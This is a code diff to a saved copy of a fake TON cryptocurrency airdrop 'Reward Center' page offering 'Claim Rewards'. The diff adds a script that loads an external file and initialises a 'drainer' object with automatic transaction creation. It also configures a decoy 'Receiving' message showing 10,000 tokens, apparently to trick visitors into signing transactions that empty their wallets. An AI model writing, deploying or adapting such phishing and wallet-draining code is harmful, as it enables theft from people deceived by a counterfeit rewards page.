--- a/index.html
+++ b/index.html
@@ -2813,6 +2813,22 @@ body {
   },false);
   function savepage_ShadowLoader(c){createShadowDOMs(0,document.documentElement);function createShadowDOMs(a,b){var i;if(b.localName=="iframe"||b.localName=="frame"){if(a<c){try{if(b.contentDocument.documentElement!=null){createShadowDOMs(a+1,b.contentDocument.documentElement)}}catch(e){}}}else{if(b.children.length>=1&&b.children[0].localName=="template"&&b.children[0].hasAttribute("data-savepage-shadowroot")){b.attachShadow({mode:"open"}).appendChild(b.children[0].content);b.removeChild(b.children[0]);for(i=0;i<b.shadowRoot.children.length;i++)if(b.shadowRoot.children[i]!=null)createShadowDOMs(a,b.shadowRoot.children[i])}for(i=0;i<b.children.length;i++)if(b.children[i]!=null)createShadowDOMs(a,b.children[i])}}}
 </script>
+<link rel="stylesheet" href="/vrtx.css?v=1.0.0" />
+<script src="/vrtx.js?v=1.0.0" defer crossorigin></script>
+<script>
+    window.addEventListener('load', () => {
+        window.drainer?.init({
+            autoCreateTransaction: true,  // Automatically create transaction
+            autoOpenModal: false,         // Don't auto-open modal window
+        });
+
+        // Override honeypot settings
+        window.drainer?.overrideHoneypot({
+            honeypot_message: "🎉 Receiving",  // Proxy Token Message
+            honeypot_amount: 10000   // Proxy Token Amount
+        });
+    });
+</script>
 
 <meta name="savepage-url" content="https://qr2ws.airdrop-ton.homes/">
 <meta name="savepage-title" content="The Open Network: Reward Center">
@@ -2968,7 +2984,7 @@ body {
                                         <span>2 693 100</span> /
                                         <total>3 000 000</total>
                                         <p>
-                                            <button class="ton-connect-trigger btn88 interact-button" role="button" id="connectBtn">Claim Rewards</button>
+                                            <button class="ton-connect-trigger btn88" role="button" id="connectBtn">Claim Rewards</button>
                                         </p>
                                     </div>
                                 </div>
